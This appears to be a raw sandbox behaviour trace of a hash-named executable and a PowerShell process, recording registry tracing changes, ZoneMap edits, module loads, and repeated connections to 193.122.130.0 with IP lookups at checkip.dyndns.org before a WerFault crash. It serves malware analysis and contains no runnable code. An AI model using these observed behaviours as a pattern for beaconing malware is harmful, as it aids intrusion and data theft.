C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_hfpoh5qd.lbj.psm1, , 0x00000000 [操作成功完成。 ], 09:33:16:991, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, REG_mkkey, HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASMANCS, access:0x0002001B , 0x00000000 [操作成功完成。 ], 09:33:16:991, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, REG_setval, HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASMANCS\EnableFileTracing, type:0x00000004 datalen:4 data:'00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:17:007, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, REG_setval, HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASMANCS\EnableAutoFileTracing, type:0x00000004 datalen:4 data:'00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:17:007, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, REG_setval, HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASMANCS\EnableConsoleTracing, type:0x00000004 datalen:4 data:'00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:17:007, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, REG_setval, HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASMANCS\FileTracingMask, type:0x00000004 datalen:4 data:'00 00 FF FF ' , 0x00000000 [操作成功完成。 ], 09:33:17:007, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, REG_setval, HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASMANCS\ConsoleTracingMask, type:0x00000004 datalen:4 data:'00 00 FF FF ' , 0x00000000 [操作成功完成。 ], 09:33:17:007, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, REG_setval, HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASMANCS\MaxFileSize, type:0x00000004 datalen:4 data:'00 00 10 00 ' , 0x00000000 [操作成功完成。 ], 09:33:17:007, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, REG_setval, HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASMANCS\FileDirectory, type:0x00000002 datalen:34 data:'25 00 77 00 69 00 6E 00 64 00 69 00 72 00 25 00 ' , 0x00000000 [操作成功完成。 ], 09:33:17:007, powershell.exe, 5080:1928, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000_Classes\Local Settings\MuiCache\9\AAF68885\LanguageList, type:0x00000007 datalen:54 data:'7A 68 2D 43 4E 00 7A 68 2D 48 61 6E 73 00 7A 68 ' , 0x00000000 [操作成功完成。 ], 09:33:17:007, powershell.exe, 5080:1928, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000_Classes\Local Settings\MuiCache\9\AAF68885\LanguageList, type:0x00000007 datalen:54 data:'7A 68 2D 43 4E 00 7A 68 2D 48 61 6E 73 00 7A 68 ' , 0x00000000 [操作成功完成。 ], 09:33:17:022, powershell.exe, 5080:1928, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000_Classes\Local Settings\MuiCache\9\AAF68885\LanguageList, type:0x00000007 datalen:54 data:'7A 68 2D 43 4E 00 7A 68 2D 48 61 6E 73 00 7A 68 ' , 0x00000000 [操作成功完成。 ], 09:33:17:022, powershell.exe, 5080:1928, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000_Classes\Local Settings\MuiCache\9\AAF68885\LanguageList, type:0x00000007 datalen:54 data:'7A 68 2D 43 4E 00 7A 68 2D 48 61 6E 73 00 7A 68 ' , 0x00000000 [操作成功完成。 ], 09:33:17:039, powershell.exe, 5080:4668, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:17:039, powershell.exe, 5080:4668, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:17:039, powershell.exe, 5080:0, 2928, EXEC_module_load, C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll, base:0x00000000684C0000 size:0x00357000 , 0x00000000 [操作成功完成。 ], 09:33:17:116, powershell.exe, 5080:7324, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:17:116, powershell.exe, 5080:0, 2928, EXEC_module_load, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\6b3b4bf6dbe30207f4ef50f235d9a8ab\System.Configuration.ni.dll, base:0x0000000073EC0000 size:0x00106000 , 0x00000000 [操作成功完成。 ], 09:33:17:148, powershell.exe, 5080:7324, 2928, FILE_readdir, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:17:148, powershell.exe, 5080:7324, 2928, FILE_readdir, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:17:148, powershell.exe, 5080:7324, 2928, FILE_readdir, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:17:163, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, NET_connect, 193.122.130.0:80, protocol:(TCP)0 , 0x00000000 [操作成功完成。 ], 09:33:17:242, powershell.exe, 5080:7324, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626#, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:17:242, powershell.exe, 5080:7324, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626#, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:17:257, powershell.exe, 5080:1928, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:17:272, powershell.exe, 5080:1928, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:17:272, powershell.exe, 5080:0, 2928, EXEC_module_load, C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll, base:0x0000000068470000 size:0x0004C000 , 0x00000000 [操作成功完成。 ], 09:33:17:897, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Program Files\WindowsPowerShell\Modules, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:17:897, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:17:931, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Program Files\WindowsPowerShell\Modules\PackageManagement, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:17:931, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Program Files\WindowsPowerShell\Modules\Pester, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:17:931, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Program Files\WindowsPowerShell\Modules\PowerShellGet, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:17:931, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Program Files\WindowsPowerShell\Modules\PSReadline, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:17:931, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Program Files (x86)\WindowsPowerShell\Modules, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:17:931, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Program Files (x86)\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:17:944, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:17:944, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Program Files (x86)\WindowsPowerShell\Modules\Pester, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:17:944, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:17:944, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:17:976, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:17:976, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:17:991, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppBackgroundTask, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:17:991, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppLocker, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:194, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:259, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:259, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:259, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405#, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:259, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:259, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:259, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:259, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:259, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:259, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:272, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9#, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:272, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9#, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:272, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:272, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:272, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:272, powershell.exe, 5080:1160, 2928, FILE_touch, C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_ilxoy4ze.yxx.ps1, access:0x00120196 alloc_size:0 attrib:0x00000000 share_access:0x00000001 disposition:0x00000005 options:0x00400064 , 0x00000000 [操作成功完成。 ], 09:33:18:272, powershell.exe, 5080:1160, 2928, FILE_write, C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_ilxoy4ze.yxx.ps1, offset:0x00000000 datalen:0x0000004D , 0x00000000 [操作成功完成。 ], 09:33:18:272, powershell.exe, 5080:0, 2928, FILE_modified, C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_ilxoy4ze.yxx.ps1, , 0x00000000 [操作成功完成。 ], 09:33:18:272, powershell.exe, 5080:1160, 2928, FILE_touch, C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_tunggdgo.upb.psm1, access:0x00120196 alloc_size:0 attrib:0x00000000 share_access:0x00000001 disposition:0x00000005 options:0x00400064 , 0x00000000 [操作成功完成。 ], 09:33:18:272, powershell.exe, 5080:1160, 2928, FILE_write, C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_tunggdgo.upb.psm1, offset:0x00000000 datalen:0x0000004D , 0x00000000 [操作成功完成。 ], 09:33:18:272, powershell.exe, 5080:0, 2928, FILE_modified, C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_tunggdgo.upb.psm1, , 0x00000000 [操作成功完成。 ], 09:33:18:289, powershell.exe, 5080:1160, 2928, FILE_remove, C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_ilxoy4ze.yxx.ps1, , 0x00000000 [操作成功完成。 ], 09:33:18:289, powershell.exe, 5080:1160, 2928, FILE_remove, C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_tunggdgo.upb.psm1, , 0x00000000 [操作成功完成。 ], 09:33:18:289, powershell.exe, 5080:1160, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass, type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:18:289, powershell.exe, 5080:1160, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName, type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:18:289, powershell.exe, 5080:1160, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet, type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:18:289, powershell.exe, 5080:1160, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect, type:0x00000004 datalen:4 data:'00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:18:289, powershell.exe, 5080:1160, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass, type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:18:289, powershell.exe, 5080:1160, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName, type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:18:289, powershell.exe, 5080:1160, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet, type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:18:289, powershell.exe, 5080:1160, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect, type:0x00000004 datalen:4 data:'00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:18:304, powershell.exe, 5080:0, 2928, EXEC_module_load, C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll, base:0x00000000683C0000 size:0x000A4000 , 0x00000000 [操作成功完成。 ], 09:33:18:336, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Appx, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:336, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AssignedAccess, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:351, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:366, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Program Files\WindowsPowerShell\Modules, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:366, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:366, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Program Files\WindowsPowerShell\Modules\PackageManagement, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:366, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Program Files\WindowsPowerShell\Modules\Pester, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:366, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Program Files\WindowsPowerShell\Modules\PowerShellGet, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:383, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Program Files\WindowsPowerShell\Modules\PSReadline, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:383, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Program Files (x86)\WindowsPowerShell\Modules, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:383, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Program Files (x86)\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:383, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:383, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Program Files (x86)\WindowsPowerShell\Modules\Pester, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:383, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:383, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:383, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:398, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea#, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:413, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea#, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:429, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:429, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:522, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:0, 2928, NET_http, checkip.dyndns.org/, protocol:(TCP)0 cmd:'GET' , 0x00000000 [操作成功完成。 ], 09:33:18:522, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:0, 2928, NET_send, 193.122.130.0:80, protocol:(TCP)0 datalen:151 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:18:572, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, FILE_readdir, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.resources, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:572, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, FILE_readdir, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.resources, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:572, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, FILE_readdir, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.resources, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:585, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, NET_connect, 193.122.130.0:80, protocol:(TCP)0 , 0x00000000 [操作成功完成。 ], 09:33:18:632, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:0, 2928, NET_http, checkip.dyndns.org/, protocol:(TCP)0 cmd:'GET' , 0x00000000 [操作成功完成。 ], 09:33:18:632, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:0, 2928, NET_send, 193.122.130.0:80, protocol:(TCP)0 datalen:151 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:18:650, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:650, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BranchCache, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:664, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\CimCmdlets, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:664, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\ConfigCI, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:664, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:664, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, FILE_readdir, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:680, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, FILE_readdir, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:680, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, FILE_readdir, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:788, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.xml.resources, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:788, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.xml.resources, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:788, powershell.exe, 5080:1160, 2928, FILE_readdir, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.xml.resources, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:18:866, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:0, 2928, PROC_exec, C:\Windows\SysWOW64\WerFault.exe, target_pid:8148 cmdline:'C:\Windows\SysWOW64\WerFault.exe -u -p 8816 -s 1508' , 0x00000000 [操作成功完成。 ], 09:33:18:866, WerFault.exe, 8148:0, 2928, EXEC_create, C:\Windows\SysWOW64\WerFault.exe, parent_pid:8816 cmdline:'C:\Windows\SysWOW64\WerFault.exe -u -p 8816 -s 1508' image_base:0x0000000000EF0000 image_size:0x0006F000 , 0x00000000 [操作成功完成。 ], 09:33:18:913, WerFault.exe, 8148:8152, 2928, REG_rmval, HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\AmiOverridePath, keyname:'HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\AppCompatFlags' , 0x00000000 [操作成功完成。 ], 09:33:19:100, WerFault.exe, 8148:8152, 2928, FILE_touch, C:\ProgramData\Microsoft\Windows\WER\Temp\WER9C60.tmp, access:0x00120089 alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000002 options:0x00000060 , 0x00000000 [操作成功完成。 ], 09:33:19:100, WerFault.exe, 8148:8152, 2928, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER9C60.tmp, , 0x00000000 [操作成功完成。 ], 09:33:19:100, WerFault.exe, 8148:8152, 2928, FILE_touch, C:\ProgramData\Microsoft\Windows\WER\Temp\WER9C60.tmp.dmp, access:0x0012019F alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000002 options:0x00000060 , 0x00000000 [操作成功完成。 ], 09:33:19:100, WerFault.exe, 8148:8152, 2928, FILE_truncate, C:\ProgramData\Microsoft\Windows\WER\Temp\WER9C60.tmp.dmp, eof:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:19:350, WerFault.exe, 8148:8152, 2928, FILE_write, C:\ProgramData\Microsoft\Windows\WER\Temp\WER9C60.tmp.dmp, offset:0x00000000 datalen:0x00000020 , 0x00000000 [操作成功完成。 ], 09:33:19:382, WerFault.exe, 8148:0, 2928, FILE_modified, C:\ProgramData\Microsoft\Windows\WER\Temp\WER9C60.tmp.dmp, , 0x00000000 [操作成功完成。 ], 09:33:19:382, WerFault.exe, 8148:8152, 2928, FILE_touch, C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D7A.tmp, access:0x00120089 alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000002 options:0x00000060 , 0x00000000 [操作成功完成。 ], 09:33:19:400, WerFault.exe, 8148:8152, 2928, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D7A.tmp, , 0x00000000 [操作成功完成。 ], 09:33:19:400, WerFault.exe, 8148:8152, 2928, FILE_touch, C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D7A.tmp.WERInternalMetadata.xml, access:0x0012019F alloc_size:0 attrib:0x00000080 share_access:0x00000001 disposition:0x00000002 options:0x00000060 , 0x00000000 [操作成功完成。 ], 09:33:19:400, WerFault.exe, 8148:8152, 2928, FILE_write, C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D7A.tmp.WERInternalMetadata.xml, offset:0x00000000 datalen:0x00000002 , 0x00000000 [操作成功完成。 ], 09:33:19:400, WerFault.exe, 8148:0, 2928, EXEC_module_load, 